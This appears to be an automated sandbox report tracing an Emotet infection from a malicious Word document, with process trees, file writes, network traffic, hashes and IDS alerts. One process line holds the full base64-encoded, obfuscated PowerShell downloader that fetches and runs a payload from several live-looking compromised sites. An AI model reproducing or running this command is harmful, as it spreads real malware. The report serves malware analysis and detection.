URL: | http://www.leapmom.com/ukeol/FILE/tBNvomC5HKLwCuxP/ |
Full analysis: | https://app.any.run/tasks/9dcb5eb7-a601-49f7-8b31-55304e21cc96 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 20, 2020, 12:42:10 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | C4FD2A0A4AD1D3A2EF760E2A76AB4FF2 |
SHA1: | E83CD9E6BEDF228DCDDEEC49FEF618D7D7C365A7 |
SHA256: | 0A386A4F1E901DEADCB51579B2ACA3A5748611BCE2576932FFB2CEFB5C9EB9C0 |
SSDEEP: | 3:N1KJS4riK2FJKyrGIY5n:Cc4rp2zK4Q5n |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2532 | "C:\Program Files\Internet Explorer\iexplore.exe" http://www.leapmom.com/ukeol/FILE/tBNvomC5HKLwCuxP/ | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
1936 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2532 CREDAT:267521 /prefetch:2 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 11.00.9600.16428 (winblue_gdr.131013-1700) | ||||
4028 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Inf 2020_10_17 IY189.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | iexplore.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
3156 | POwersheLL -ENCOD JABGAG0AZAA2AF8AZQBiAD0AKAAnAFAAJwArACgAJwB3AGUAJwArACcAZQAzAHUAOAAnACkAKQA7ACQAQwBqAGkAYQB0AHgAMQA9ACQARgB0AGoAYgB3AGIAMgAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQASAAzAGEANQBxAGEAOQA7ACQARAB0ADQAaAB0ADcAbgA9ACgAJwBJACcAKwAoACcAaQBiACcAKwAnADIAMAAwACcAKQArACcAYgAnACkAOwBbAHMAeQBzAHQAZQBtAC4AaQBvAC4AZABpAHIAZQBjAHQAbwByAHkAXQA6ADoAIgBDAGAAUgBlAEEAdABFAGQAaQBgAFIARQBDAGAAVABPAHIAeQAiACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBZACcAKwAoACcAbQAnACsAJwBxAHgAbQAnACkAKwAnAGMAYwB7ADAAfQBSAHIAJwArACgAJwBsACcAKwAnAGkAcAAnACkAKwAnADgAZgB7ADAAJwArACcAfQAnACkAIAAgAC0AZgBbAEMAaABhAFIAXQA5ADIAKQApADsAJABQAGYAYQA3AHkAZABkAD0AKAAnAFAAMgAnACsAJwB1AGkAJwArACgAJwBlACcAKwAnAGgAMwAnACkAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABjAFUAcgBpAHQAeQBgAHAAcgBvAGAAVABPAGMAYABPAEwAIgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAIgB0AEwAYABzADEAMgAiADsAJABSADAAXwBpADMAegB3AD0AKAAoACcARQAnACsAJwBxADIAbgAnACkAKwAnAGEAJwArACcAYQBvACcAKQA7ACQASwBuAHUAegBsADIAagAgAD0AIAAoACgAJwBTACcAKwAnADgAagBrAGEAJwArACcAYwAnACkAKwAnAHMAJwApADsAJABLAHgAeAAzAG0AZgB6AD0AKAAoACcATQBzACcAKwAnAGMAJwApACsAKAAnAF8AMAA0ACcAKwAnAG4AJwApACkAOwAkAE8AeQAxAGgAbgAyAGYAPQAoACgAJwBKAGgAdAAnACsAJwBoACcAKQArACcAMAAnACsAJwByAHUAJwApADsAJABVADAAOABoAG8AYgB6AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAoACcAVQA4AGcAJwArACcAWQBtACcAKwAnAHEAeABtAGMAYwAnACkAKwAnAFUAJwArACgAJwA4ACcAKwAnAGcAUgAnACkAKwAnAHIAbAAnACsAJwBpACcAKwAnAHAAJwArACgAJwA4ACcAKwAnAGYAVQA4AGcAJwApACkALgAiAHIAZQBQAGwAYABBAGAAYwBlACIAKAAoAFsAQwBoAGEAUgBdADgANQArAFsAQwBoAGEAUgBdADUANgArAFsAQwBoAGEAUgBdADEAMAAzACkALABbAFMAVAByAEkAbgBHAF0AWwBDAGgAYQBSAF0AOQAyACkAKQArACQASwBuAHUAegBsADIAagArACgAJwAuACcAKwAoACcAZQAnACsAJwB4AGUAJwApACkAOwAkAEwAMAA1AGUAYwA1AGEAPQAoACgAJwBUAHgAJwArACcAOAAnACkAKwAoACcAcwA5ACcAKwAnAG8AbwAnACkAKQA7ACQAVQBpADkAZABoAGwAZQA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAQgBjAGwAaQBFAE4AdAA7ACQAVAA3AHAAcwBpAHUANQA9ACgAKAAnAGgAdAB0ACcAKwAnAHAAcwAnACkAKwAoACcAOgAvAC8AcwAnACsAJwBoAHIAbwAnACkAKwAoACcAbwBvAGsAJwArACcALgAnACkAKwAoACcAYwBvACcAKwAnAG0AJwApACsAKAAnAC8AZABvACcAKwAnAC0AaQAnACkAKwAoACcAdAAvACcAKwAnAEIAUQAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAJwA0ACcAKwAoACcAawB3ACcAKwAnAGEAJwApACsAKAAnAGwAbAAnACsAJwBwAGEAJwApACsAKAAnAHAAZQByACcAKwAnAGQAJwApACsAKAAnAG8AJwArACcAdwBuAGwAJwApACsAKAAnAG8AJwArACcAYQBkAC4AYwAnACkAKwAnAG8AbQAnACsAJwAvACcAKwAoACcAdwBwAC0AJwArACcAYQAnACkAKwAoACcAZAAnACsAJwBtAGkAJwApACsAJwBuACcAKwAnAC8AJwArACgAJwBFACcAKwAnAFQALwAnACkAKwAnACoAaAAnACsAJwB0AHQAJwArACgAJwBwAHMAOgAvAC8AYgByAGEAJwArACcAaABtACcAKwAnAGEAJwApACsAKAAnAG4AJwArACcAaQBtACcAKQArACcAZQB0ACcAKwAnAGEAJwArACcAbAAnACsAJwAuAGMAJwArACgAJwBvACcAKwAnAG0AJwArACcALwBoAG8AcgAnACkAKwAoACcAaQAnACsAJwB6AG8AbgAnACkAKwAoACcALQB0AHIAJwArACcAYQBuACcAKQArACgAJwBzAHAAbwByACcAKwAnAHQALwAnACkAKwAoACcAZAAvACoAJwArACcAaAB0ACcAKQArACgAJwB0AHAAJwArACcAOgAnACkAKwAoACcALwAvACcAKwAnAHIAZQBzACcAKQArACgAJwB1AGMAbwAuACcAKwAnAG4AZQB0ACcAKQArACgAJwAvAGIAJwArACcAYQBjAGsAJwApACsAKAAnAHUAcAAvACcAKwAnAGsAJwApACsAJwB4AGYAJwArACcALwAnACsAKAAnACoAaAB0AHQAcAAnACsAJwBzADoALwAvACcAKwAnAG8AJwArACcAcABsACcAKQArACgAJwB1AG4AZwAnACsAJwBpACcAKwAnAHAAaABvAG4AJwApACsAKAAnAGUALgBuAGUAdAAvACcAKwAnAHcAJwApACsAKAAnAHAALQBhACcAKwAnAGQAJwApACsAJwBtACcAKwAoACcAaQBuAC8AJwArACcATgB4AC8AKgBoACcAKwAnAHQAdABwAHMAJwApACsAJwA6ACcAKwAnAC8ALwAnACsAJwBsAHUAJwArACgAJwBkAHcAJwArACcAaQAnACkAKwAnAGcAJwArACgAJwBtACcAKwAnAG8AZAAnACsAJwBlAGwALgAnACkAKwAoACcAbgAnACsAJwBlAHQALwAnACsAJwB3AHAAJwArACcALQBhAGQAJwApACsAJwBtACcAKwAoACcAaQBuAC8AJwArACcAaQAvACcAKQArACgAJwAqAGgAJwArACcAdAB0AHAAcwA6ACcAKwAnAC8ALwAnACkAKwAnAGEAJwArACcAcgAnACsAJwBrAGEAJwArACcAbgAnACsAJwAtAG0AJwArACgAJwBlAG0AYQByACcAKwAnAC4AJwApACsAKAAnAGMAbwAnACsAJwBtAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGMAJwApACsAJwBvACcAKwAnAG4AJwArACgAJwB0AGUAbgB0ACcAKwAnAC8AJwApACsAKAAnAGcARwAnACsAJwAvACcAKQApAC4AIgBzAHAAbABgAGkAVAAiACgAJABPAG4AMgBtAG4AawB5ACAAKwAgACQAQwBqAGkAYQB0AHgAMQAgACsAIAAkAE0AYwBwAGUAdwByAGYAKQA7ACQAWQByAHUAXwBfAGkANQA9ACgAKAAnAFEAJwArACcAegByADIANQAnACkAKwAnAHkAJwArACcAeAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFkANgAwAGgAbwBfAHYAIABpAG4AIAAkAFQANwBwAHMAaQB1ADUAKQB7AHQAcgB5AHsAJABVAGkAOQBkAGgAbABlAC4AIgBEAGAAbwBXAGAATgBsAG8AQQBEAGYAaQBgAEwARQAiACgAJABZADYAMABoAG8AXwB2ACwAIAAkAFUAMAA4AGgAbwBiAHoAKQA7ACQAVgB3AHkAdgAyAGgAagA9ACgAJwBIAGUAJwArACcAeAAnACsAKAAnAGEAcAAnACsAJwA4AHAAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAVQAwADgAaABvAGIAegApAC4AIgBsAGAAZQBuAEcAdABIACIAIAAtAGcAZQAgADIANgA0ADAAOAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AKAAoACcAdwAnACsAJwBpACcAKwAnAG4AMwAyAF8AUAAnACkAKwAnAHIAbwAnACsAKAAnAGMAZQBzACcAKwAnAHMAJwApACkAKQAuACIAYwBgAFIAZQBBAFQAZQAiACgAJABVADAAOABoAG8AYgB6ACkAOwAkAFgAdQByADUAbwA5AGwAPQAoACgAJwBBAHoAJwArACcAegA1ACcAKQArACcAOQAnACsAJwA2ADUAJwApADsAYgByAGUAYQBrADsAJABLAGsAYQA1AHUAaQAyAD0AKAAoACcASwB6ADYAdwAnACsAJwA1AGsAJwApACsAJwAyACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgBqADkAZABmAGcAcAA9ACgAKAAnAEoAYgAnACsAJwAxAHQAdQAnACkAKwAnAG0AbgAnACkA | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1944 | C:\Users\admin\Ymqxmcc\Rrlip8f\S8jkacs.exe | C:\Users\admin\Ymqxmcc\Rrlip8f\S8jkacs.exe | wmiprvse.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2896 | "C:\Users\admin\AppData\Local\WSDMon\Wwanadvui.exe" | C:\Users\admin\AppData\Local\WSDMon\Wwanadvui.exe | S8jkacs.exe | |
User: admin Company: Steffen Lange Integrity Level: MEDIUM Description: Password Changer Version: 1.0.0.1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1936 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Inf 2020_10_17 IY189.doc.t9x08t9.partial | — | |
MD5:— | SHA256:— | |||
2532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF6B482CAF6920B3E5.TMP | — | |
MD5:— | SHA256:— | |||
2532 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\Inf 2020_10_17 IY189.doc.t9x08t9.partial:Zone.Identifier | — | |
MD5:— | SHA256:— | |||
4028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5CF9.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4028 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_281BC07C-CF0F-49DC-B7AC-72D1D36B88F9.0\4429DC3D.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3964 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_281BC07C-CF0F-49DC-B7AC-72D1D36B88F9.0\~DF8513ADCEFF517A06.TMP | — | |
MD5:— | SHA256:— | |||
3156 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YF4R69NCXWX8O1XOJ8WR.temp | — | |
MD5:— | SHA256:— | |||
3156 | POwersheLL.exe | C:\Users\admin\Ymqxmcc\Rrlip8f\S8jkacs.exe | — | |
MD5:— | SHA256:— | |||
2532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\CabC2A9.tmp | — | |
MD5:— | SHA256:— | |||
2532 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\TarC2AA.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1936 | iexplore.exe | GET | 200 | 47.106.249.22:80 | http://www.leapmom.com/ukeol/FILE/tBNvomC5HKLwCuxP/ | CN | document | 161 Kb | suspicious |
2532 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
3156 | POwersheLL.exe | GET | 200 | 148.251.129.209:80 | http://4kwallpaperdownload.com/cgi-sys/suspendedpage.cgi | DE | html | 7.46 Kb | suspicious |
2896 | Wwanadvui.exe | POST | 200 | 2.45.176.233:80 | http://2.45.176.233/TmzTBbLYYCS5/ | IT | binary | 132 b | malicious |
3156 | POwersheLL.exe | GET | 302 | 148.251.129.209:80 | http://4kwallpaperdownload.com/wp-admin/ET/ | DE | html | 682 b | suspicious |
2532 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D | US | der | 1.47 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1936 | iexplore.exe | 47.106.249.22:80 | www.leapmom.com | Hangzhou Alibaba Advertising Co.,Ltd. | CN | suspicious |
3156 | POwersheLL.exe | 148.251.129.209:80 | 4kwallpaperdownload.com | Hetzner Online GmbH | DE | suspicious |
3156 | POwersheLL.exe | 172.67.132.252:443 | brahmanimetal.com | — | US | suspicious |
3156 | POwersheLL.exe | 104.27.155.111:443 | shroook.com | Cloudflare Inc | US | unknown |
3156 | POwersheLL.exe | 14.177.232.31:80 | resuco.net | VNPT Corp | VN | suspicious |
— | — | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
2896 | Wwanadvui.exe | 2.45.176.233:80 | — | Vodafone Italia S.p.A. | IT | malicious |
2532 | iexplore.exe | 152.199.19.161:443 | iecvlist.microsoft.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
www.leapmom.com |
| suspicious |
shroook.com |
| unknown |
4kwallpaperdownload.com |
| suspicious |
brahmanimetal.com |
| suspicious |
resuco.net |
| suspicious |
iecvlist.microsoft.com |
| whitelisted |
r20swj13mr.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1936 | iexplore.exe | Potentially Bad Traffic | ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) |
3156 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3156 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3156 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2896 | Wwanadvui.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 16 |
2896 | Wwanadvui.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |